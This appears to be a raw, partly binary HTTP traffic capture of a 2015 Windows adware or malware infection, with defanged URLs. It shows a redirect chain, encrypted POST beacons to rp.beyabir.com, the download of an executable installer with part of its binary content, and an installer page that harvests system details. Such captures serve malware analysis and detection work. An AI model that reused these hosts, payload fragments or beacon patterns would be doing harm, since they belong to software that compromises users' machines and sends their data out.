keep-alive..0...0...........0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Daddy Root Certificate Authority - G20...090901000000Z..371231235959Z0..1.0...U....US1.0...U....Ari

<<< skipped >>>

GET /8Hk4o HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.nowtake.me

Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently

Server: nginx/1.0.15

Date: Thu, 30 Apr 2015 23:07:42 GMT

Content-Type: text/html

Content-Length: 185

Connection: keep-alive

Location: hXXp://VVV.4threquest.me/010914s/010914i.htm

Access-Control-Allow-Origin: *

Access-Control-Allow-Headers: X-Requested-With

Access-Control-Allow-Credentials: true

<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.0.15</center>..</body>..</html>..HTTP/1.1 301 Moved Permanently..Server: nginx/1.0.15..Date: Thu, 30 Apr 2015 23:07:42 GMT..Content-Type: text/html..Content-Length: 185..Connection: keep-alive..Location: hXXp://VVV.4threquest.me/010914s/010914i.htm..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.0.15</center>..</body>..</html>....

POST /?pcrc=236440515&v=2.0 HTTP/1.1

Accept: */*

Host: rp.beyabir.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Length: 864

Cache-Control: no-cache

...3E.Q)_l.y...K8....r.=4p.........OL..6_/r.......5.......n(..M.O..E.#.. .X....1...S.A.....A...v.r.o.*.DZ.7.....R..{WxI...].38<..RXG.\].^.. A.. ..(...w.g:.OW..>[.!....m..2.... .....m.........mBdhl)...F"!F_.. .=...]W...r..u......P.l...V..ur...]...3.*.k.j8u.."F..9.3z...L.$*m.h$.@.1...f.)...|... .if/ ..../..5.......6{...........(..!...3%"..&ma.)a.E&'...|...Zm.tb.. {...0..F..l.*..Ax..>3)..`8!......o..

....:b=%....<...(..I.z..........5.{...A.Y[4*....Eg.h,S.o.

.~B.^8.?.T..vD.P.t"...I...l.D?J......a*.t.uS.p.R...>#......1t..TO.0.b..}... p`...L...1{jq|pZ..i...W....q..$).0...,......U.=.......5Pas....2oj...I..`..>...../9.x.|;..%

.#E....-.Cn...k..2H..8D..TW...].1..M.xD...0.:...:.....b..2...Y..8.xG..L.g hT7.-(.oa<.....Kc...#..8M.2._...Vq]G|#Z........\..........}..e.s...I.[}.... ....0.:..l........L....a.}.%5..0..o..d

.J.....ij..*.'.....d@D9...xV...r........

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 30 Apr 2015 23:07:06 GMT

Server: TornadoServer/4.0.2

Content-Length: 4

Connection: keep-alive

DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:06 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE....

POST /?pcrc=1901405883&v=2.0 HTTP/1.1

Accept: */*

Host: rp.beyabir.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Length: 1200

Cache-Control: no-cache

.I..~...$$.........n..Z.Z........(.z ..9...L

..a...L8{..sq."?m..vY.U...I.w.....#}..@.J$.'..3. .W3.}......i.F.;Dgix.i}..U~...]P{.....-..<..&...&...J.".0I.9.Dtl....1......f..._..EO. .G....G.F..G.L.4U..uL..9..I...s.gj.n.TY........{.u..;..(\.D..q/..4I'..

....J...Vv\.i_...Z......H....3....&s.X;..$B...@....6.N......L.f.E.d../....>........X#x..Z...RmF5u..R.=....3.>....[..a.*{...|..`....g.....)b8.m..jUJ.5.t..D.8...".....`......N.>..{.1]6V......'.U......H...m._...<......:..b.^ju.........

/....wT...L....`...0.[.y1.....X.g......I....6......(?~?i`...e..@.TS..;|......O`z.....B.P...@....6...W\_...W..v.5..iV3...R.ku.._.....L.F....u#..]o.:>-..H...v........>N..|.i0..A<0]BT..B.....g........Y..s.m.....P........s......e.....$.nx.........M~..U,........`.P..:<..Q...U..8...'...?.P..0@..U\.C..K....D3-l.3a[.....o....zft.Tu5$i3........m.l..S#i^T<....>......... .{G..7<....y....N..E..|..G.e\........2.O'c..

......z...i..?UH....A5y.....O#Q~....%..*T.Z...&....z...:n.KH..-.m.`.%.~...6...f.(u..@.=......?.x"..k......!..h.e(!6;Q........}...*.E.......o.y.C.|..Z.x..k TbJF.

Od.....5.....sP.....B@...S.].,A....G.Li...G.J.,(.\.) ..o.A.\....n..^..)\.\..(hXq>{..#p...HiZ..H&..../.Z.L.Bcv1.^..:.....1....I}4..~.

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 30 Apr 2015 23:07:06 GMT

Server: TornadoServer/4.0.2

Content-Length: 4

Connection: keep-alive

DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:06 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE....

POST /?pcrc=718955205&v=2.0 HTTP/1.1

Accept: */*

Host: rp.beyabir.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Length: 672

Cache-Control: no-cache

...4.....>.K..~. m].\..1.I...,*R.C.V....E..4A..1....!6..S<.*.W.~j.ofC~"..!.X...^.n.o..5g.]oG46IZ.....Kt.R_nL.....^T.q....R...........c.6h........gA3......,......f...a..>.i..M..[.....m.e..jF.z^..............;^.h....Z.....J....qCn.i.......w...U.T..".:%c.........S.H..}..g.a.A.I.0..%...S0....A3.....r.....X..... ....<..U..I....`......m...k.[M.k~ u..W.|.N...y......b[%.a..<8...\..R..{..%._.?....NR.....%.f#.j...b.L....w.F...TaG.....L7.w\..F..3.Ao.*.X7L.yodeh.N......8.8T.L..r....g }...[..........ya.....U@/]5.ZI.?..d..*2jQ..s.8U.!...e.<C2. r]`.,&Ix.<..lE....!4...;...o.3.M.....q.G}.Qe.h...J..!...(X.~,.....|..lE..d..J.4R.|..U<w.....Y..=n..H.c2....*..gq..{...P%...

(k...

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 30 Apr 2015 23:07:08 GMT

Server: TornadoServer/4.0.2

Content-Length: 4

Connection: keep-alive

DONE....

POST /?pcrc=629602451&v=2.0 HTTP/1.1

Accept: */*

Host: rp.beyabir.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Length: 672

Cache-Control: no-cache

.I..G.)E..,(D-....../3.gA...#A.j..N..-bD$. ..V$. ..21......<a(.>%u...5.L.CV.. ]......../...6{m(W#.#..6...~.{\.!...V._......%...&.%.E.z8H..-.....*..T. ...*..x...rB[...?.CF.......

...........k}./..(.J .....4....[..kp..I..N..*....ob1".7.`.8o........IY.@........,..=s

k..R=.)A.....5..~b80......`

.%."S........=|...x...sJJ;..cA*.q.`.........>.....l...n..=.{w?.W..ni3.m*.h:..4..*Q-.;.u.....i..7

.....c_....-m...*.W..J.,..}O..X.7$k0.B..>\.9..g....~ub..pbWE...t.9.Md......hC#..L4..e...J...u.Yy.[....M.,..>U....B.`..sZz.Qw#.7.. ..^.4..y.R...d..z..@*.s.3>........r.:1.o...\.^.s.aD.}.............ah.....g.FKmr.[.......!(.p....8*......L..Y.F.............J1.[q.n"0[.... ........

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 30 Apr 2015 23:07:08 GMT

Server: TornadoServer/4.0.2

Content-Length: 4

Connection: keep-alive

DONE....

POST /?pcrc=688063635&v=2.0 HTTP/1.1

Accept: */*

Host: rp.beyabir.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Length: 672

Cache-Control: no-cache

I'.........a.o.~`NH...W.5..............3.A.I.....r..&U(#b..6--5.J'V8V.c....3.P......?.p..G...QqF.......;........PF .xA.3...t....T...j...... .:c. ...J...>W~.c....c....z}2...P.{.g...'.....liA.....\.ez.~..fz.....V.W.Q.L|..{...2mP....2u..."(N.7.7t...`X.0...-T8...... .M@.eL.....D....{...d.....Td.0c.o..'........-.8.Q.m*...-3\....g/W..#J....~.:Q.<R..{.y.#..~d.f0.\..F...z..V...$a......

B.?.........8u.8Xz...v7.y...W

\......'...<?C .M9{Q..6...k^i.H{Fs#..J.u.k..7.h..yvW..........*H..dy.._.p..p.;.L.@..&.^.ba...e.........V..6 n.w.V.....|c.tYW*

.......x-[...].b.. -xe@d...<..<..)...?Q..98......(.._M7..,.).I..0[.<u...3a>]....H..s:.g.]/...`..B.....RA.I.2.....Q[d...........

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 30 Apr 2015 23:07:08 GMT

Server: TornadoServer/4.0.2

Content-Length: 4

Connection: keep-alive

DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:08 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE....

POST /?pcrc=216881437&v=2.0 HTTP/1.1

Accept: */*

Host: rp.beyabir.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Length: 2352

Cache-Control: no-cache

W..$...1.:.A].PP.E.......FL .........

..P....?...`..u.....p.gE.d{B.S.VB.z...W..1.hU....&.:......4....K.....E....f.Z2d...}..........';....!.Et....Cr.g....B..@.D..^T,.n$T....d..i.....QQ..

n9/....c....5.i...M.:$.!. :&.........#/.u.S.^.D#/3..`Y.*. .q.OU.....5....@.......5..BvoB....fid.@-I.E.!..S.*)..q:....i..,_#.pp.iER[#.J...__.9......3.....3.q....(.....W.ilN.......6..~./..|..[yv=p.G.D.y.r.9.8.Go.[4.L;.tp.>|.o.....=.<C..E8../O......D8....@.W`.....5>[H..}.C.fpV..c[...1.......p......z..FY W6...eb.2].7D.X....'.m.!.Gs...{f...l]..........e4o.(l...Z.Y....}..e.c.......?.//..K.x.......C.o.2.H.Y...!0...w....rc........iP.$..&..Ii@.I.e..p

..l..i.Da:]........(.O........../..s.".........T^.ux.T........nc(m...E.....U.HL.....|F.s.&.?...*..../.'.v..4...Vm....F..m1..!...%...%...S.P-../Xh@.e..% .F.@w..2.2.......A...C%?B.O.....&..Y...l

...9.AF*.W..O..../..O.F.20.k..v.7..|...2.D.U"!{T$...4:Cq ..A.Z.M...e..}^g.......vC...v.........Z.....!.....2u...f.l.......K@......#6L

...s..8.:.a.c.V.........r]M.'..@.S.....I.....7.I.."...Jh...N.O.U...i...ET......IB..A.....}.X.C8..W.AQ..a......5.-4........V..@.s......(...\.w

....w...A:...p..gfN2,..8/.g4..."..0.m[....Jsb....{.w. ...K....F....:X..c...!.{pI.....b..y&.p..m...9..r....n..&..IB.$f..N...'..../...v.K......_#.?kY5.X.m..a.)).....}.,..s....M.....w.....<W ...4h.T......pZ....=Y...S.g

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 30 Apr 2015 23:07:30 GMT

Server: TornadoServer/4.0.2

Content-Length: 4

Connection: keep-alive

DONE....

POST /?pcrc=1431802907&v=2.0 HTTP/1.1

Accept: */*

Host: rp.beyabir.com

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Content-Length: 2256

Cache-Control: no-cache

...QzK....i.......$.. ..rg..9.O[..cDU.1P4.~Wl....`...@RV..6...L.~...^;.e.>....>A..4....^....^l....)..~........7........t.[..[.....17.........T..\.J..0Z.gB.......z.u..H...}Dc.......'7.>.%..J......V=:7.......z.2..0..........l.......P.o.......[..... .8F...%........Z*...H.`N..c:../....'. ...$..,....s.S.SzX....>..X..@.'...!V......,d....c.>.

...?V...q.P..\.............M..y../U..E......<...5....B..x...=......4_q.u.5..&.f".9.xF....J_.L.N7.Y.].

.Q..W.}N..ez.2...f_.O..\...v.c.*.....L{{l....{."g.1v.m._.....k.W2|(.|.Y...a5)D..6...;..$..7..-...... ....P..`.F....I.ZS....A`C[...o"..b4.&..h..'t.o .3.6...A.90L.*...N`...5....2...Z.

U#.(d..e.S.z..p.6..9.D.)^5....i...yO.......{.HD.....d.s.{.....~Q.)....D...~..."..[.[(.....|..q...R4..Z..p.......?..'...

[....p..V...f....p ..u........uf.e)H~.d9.m..8......AIkKc...83.yr>......P.

x{..#.j....^f.A$..-.._.hxKxb..P_.........T*.?.)..C..[..6u.)...ml..46:..y..W....K.y.D60.yS *...$..M.&.......=..&..n.hz......&..odA.A"...(9..,..W..C|..3vT.'...3v..n.}....U."..fE.?.c.&..ZE?6t$.z..8(.p..x&N.C...;'.cK..YHob.....CHw...'..*aY....(.....H......".c%"...zD..ko.j&..4

M........

)..}..Kq...K..Q../}p..1.[qM[V.....o:].TB.&_...../..>.X.t...}.^F$J..W.9.

1|N%U..k.L.^C..N.r.(.%|B.O....[..i...)S...RO.....,7.-..."]...$.~.l......q#%..s$......`.~..x.x~...mku.1..U:............^...*...@.&D.

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 30 Apr 2015 23:07:30 GMT

Server: TornadoServer/4.0.2

Content-Length: 4

Connection: keep-alive

DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:30 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE..

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com

HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1790

content-transfer-encoding: binary

Cache-Control: max-age=489793, public, no-transform, must-revalidate

Last-Modified: Wed, 29 Apr 2015 15:15:07 GMT

Expires: Wed, 6 May 2015 15:15:07 GMT

Date: Thu, 30 Apr 2015 23:12:18 GMT

Connection: keep-alive

0..........0..... .....0......0...0......'.V.8.F.V....H....JW..20150429151507Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5.......A..2.....:...:......20150429151507Z....20150506151507Z0...*.H.............M...2..s..7...........rh.O..2Q........Vn...09..e]..D$.u...r3...x....T.#...................3.X.."mn.w...@..J..H".)=..d.3...SZK...bH.PD..I..9Js.H).2I.....l^|\.?$_7;E......y...ff...}^9...1....}.....fc..:.............T...1;'.o..V.e.=.b*tX[.,..M.H..O7..!.%.A..,...#0...0...0..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at https://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Class 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.............m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d...nz(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F*]...*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."...:.C.Q.i~rl..<..krS..8.B..o].y..L.4...iB@..s.....mw.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...*.H......

<<< skipped >>>

GET /v4/searchprotect/535559167_198339_B48A115F?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2253 HTTP/1.1

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.

Host: xa.xingcloud.com

HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Thu, 30 Apr 2015 23:07:40 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

48..{"stats":"ok","time":"1.59 ms","message":"store 2 action and 4 update "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:40 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"1.59 ms","message":"store 2 action and 4 update "}..0..

GET //MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCEMMb3zC402/ HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:12:18 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=119989, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 22:17:23 GMT

Expires: Sat, 02 May 2015 10:17:23 GMT

ETag: "c0773ca97a9364f110e8a1925adda329f5e6c722"

Content-Length: 1787

Connection: close

Content-Type: application/ocsp-response

0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G2..20150430221723Z0k0i0A0... ..........._lkv...8..f..R34N..@..'..4.0.3..l...,....C.o|..M.....20150430221723Z....20150502101723Z0...*.H.............q.........E.##J.$E,G..0 .......r..)5..L...[>..G..@...f..H..Nz^....K.W'...E.W.=Uws..S.,.....%|.C.....S.3.D.D..L...*...8...]...m...K;<...L.qr^..!..1...iRo.L...p............l...y[...dF...66,s....z..)...!.W..E.f.@.....^M&.G..Sx....a..)u..VIbz...9..h-.....h.!."....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p..........0...0...U.......0.0...U...........0...U.%..0... ......... .......0...U.......O........f...e..r..0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0...*.H............

<<< skipped >>>

POST /tdownload.php HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 106

Host: VVV.lawfuldownload.com

version=1.1.2.41&s1=5844fe1867a9e3700b6c2f6fc517337ccbd4629e&t1=1430435409&campid=9664&prefix=amisetup2899

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Access-Control-Expose-Headers: X-Target-FN

Content-Disposition: attachment; filename="amisetup2899__9664.exe"

Content-Type: application/x-msdownload

Date: Thu, 30 Apr 2015 23:07:10 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

X-Target-FN: amisetup2899__9664.exe

Content-Length: 870912

Connection: keep-alive

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................'.......&.......'...............................".....................Rich....................PE..L.....@U.................F...................`....2..........................@,.................................................P.... .. ;...................`.......................................................`..P............................text....E.......F.................. ..`.rdata..\....`.......J..............@..@.data...$...........................@....rsrc... ;... ...<..................@..@.reloc.......`..."...(..............@..B........................................................................................................................................................................................................................................................................................................................................U..j.h.@4.d.....P.P.5.3.P.E.d......E........@......E......M.d......Y..].........U..j.hX<4.d.....PV.P.5.3.P.E.d......u..E.........t.P...............F.....V...........M.d......Y^..].............U..j.h(<4.d.....PV.P.5.3.P.E.d......u..E.........t.P...............F......M.d......Y^..]...............@............t.P.f.............F.........U...E...~.%.........]...........U..j.h.;4.d.....PQV.P.5.3.P.E.d......u..E.P...E......C....E.........4..E........M.d......Y^..]..................U..j.h.;4.d.....PQ.P.5.

<<< skipped >>>

POST /index.php HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.amoninst.com

Content-Length: 333

Connection: Keep-Alive

Cache-Control: no-cache

Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.0.30319&OSversion=NT6.1SP1&Slv=&Sysid=915A4028688142931B5DDA64A4540CAD&Sysid1=066389C9740F80692FC30C6511692204&X64=Y&admin=Y&browser=IE.HTTP&cavp=&chver=35.0.1916.153&ci=9664&exe=amisetup2899__9664&ffver=29.0.1.5239&i=MyBestOffersTodayBR&lang_DfltUser=0409&netfs=3&s=Y&ts=1430435233&ver=1.1.2.41

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Thu, 30 Apr 2015 23:07:14 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

transfer-encoding: chunked

Connection: keep-alive

15d1.... .. ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=UTF-8" /> ..<title>Installer</title>..<base href="hXXp://VVV.amoninst.com:80/index.php" />..<script type="text/javascript" src="hXXp://cdn1.lawfuldownload.com/V19/amipb.js"></script>..<script type="text/javascript">..var g_amiobj = '', g_ami, g_updb = false, g_close = '0', g_additional_offer_list = '0';..var g_finish_install_button = '0';..var g_popup_install_all = '0';..var g_eula = ''; ..var g_post1 = '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3';..var g_icon = '';..var g_comps = [], g_pages = [], c, g_curPage = -1;..var g_cid = '9664';..var g_tid = '';..var g_cc = 'UA';..var g_lang = 'en';..var g_ip = '193.138.244.231';..var g_browser = 'ie';..var g_cnt = '3e5a8f2a30ab988ef7a611138130e98a';..var g_ver = '1.1.2.41';..var g_buttonImage = 1;..var g_thanks = 'thankyou.php';..var g_images = [];..var g_purl = 'hXXp://VVV.amoninst.com:80/pix.php';..var g_skipCats = 0;..var g_ieVer = '7.0';..var g_chVer = '35.0.1916.153';..var g_ffVer = '29.0.1.5239';..var g_netfs = -31;..var g_vert = 3;..var g_os = "NT6.1SP1";..var g_current_screen = '';..var g_custom_next_button_event = '0';..var g_custom_next_button = '0';..var g_install_all = 0;....function InitInstall()..{.. g_ami.AddThank

<<< skipped >>>

POST /finalize.php HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://VVV.amoninst.com/index.php

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.amoninst.com

Content-Length: 229

Connection: Keep-Alive

Cache-Control: no-cache

_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_updater=0&r_MyBestOffersTodayBR=0.01&updater=3&MyBestOffersTodayBR=2

HTTP/1.1 200 OK

Content-Type: text/xml

Date: Thu, 30 Apr 2015 23:07:14 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 2409

Connection: keep-alive

....<Array><page><f>1</f><fb>1</fb><pt>0</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><must_show>0</must_show><bdy>PGRpdiBjbGFzcz0iY2xhc3MtMWxpbmVyIj48ZGl2IGNsYXNzPSJjaGVjay1ob2xkZXIiPjxkaXYgY2xhc3M9ImNsYXNzLWNoZWNrLTEiIGlkPSJhbWlfY2hlY2tfTXlCZXN0T2ZmZXJzVG9kYXlCUiIgb25jbGljaz0iQW1pQ2hlY2tDdHJsQ2xpY2tlZCgpIj4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgaWQ9ImlfYW1pX015QmVzdE9mZmVyc1RvZGF5QlIiIG5hbWU9Ik15IEJlc3QgT2ZmZXJzIFRvZGF5IiB0eXBlPSJoaWRkZW4iIHZhbHVlPSIxIiAvPjwvZGl2PjxkaXYgY2xhc3M9ImNsYXNzLWxpbmUxIj48c3Bhbj5UT0RPUyBPUyBESUFTIFVNQSBPRkVSVEEhPC9zcGFuPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9ImNsYXNzLWxpbmUyIj48c3Bhbj5CeSBDbGlja2luZyAiTmV4dCIgb3IgIkluc3RhbGwiLCBJIGFncmVlIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vZ29vLmdsL25pMm1yZSIgdGFyZ2V0PSJfYmxhbmsiPlRlcm1zIG9mIFNlcnZpY2U8L2E IGFuZCA8YSBocmVmPSJodHRwOi8vZ29vLmdsL1NIcDhSZyIgdGFyZ2V0PSJfYmxhbmsiPlByaXZhY3kgUG9saWN5PC9hPiBhbmQgY29uc2VudCB0byBpbnN0YWxsIE15IEJlc3QgT2ZmZXJzIFRvZGF5Ljwvc3Bhbj48L2Rpdj48L2Rpdj48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iMSIgaWQ9ImlfYW1pX3VwZGF0ZXIiLz48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0idXBkYXRlcixNeUJlc3RPZmZlcnNUb2RheUJSIiBpZD0iYWxsX3Nob3J0X25hbWVzIi8 </bdy><img>__empty__</img></page><page><f>1</f><fb>0</fb><pt>1</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><must_show>0</must_show><bdy>DQo8

<<< skipped >>>

GET /fp?alpha=A0E1QRo8DxMHXnc7GmsVAgVmTBoDHSMwWyRAZFVFRRE7FQkVajgxdXQFKDU/K0o1FmJxKl9DW2labB4MAwlIMG1tQHQoG1AVK0NZPBgXIntcXC4VWxdFfT8ScCc3AQYME2xKHVc4Mz59AwYsR1ZcUTUcZwA2U0NcAkZkHQ4QRgofYQs+MAxeBwAmQl97FVMnGFEMMwBBRFQxNQpwLicFUxhBYEccUi00N2QHCjkVSU8ENwQ0VycPQU5NGml9VFlBFxgkfSciDkQMQn8bGCYUAD9kJSklQgRBSWI9G3QvMQMEE0EqCxIxZGtjK0ZAOTMeCQJuQDNBWRdAURxDYx82EFEMGDhgMndVHFZpJkJSDklEXgVHKDYRW2RNYzkHdC8xCnQHY24layI/aEQOXW8YcQ== HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: install.plainsavingscenter.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: text/plain

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

SVR: SP001C2

X-Powered-By: ASP.NET

p3p: CP="CAO PSA OUR"

Date: Thu, 30 Apr 2015 23:07:14 GMT

Content-Length: 0

....

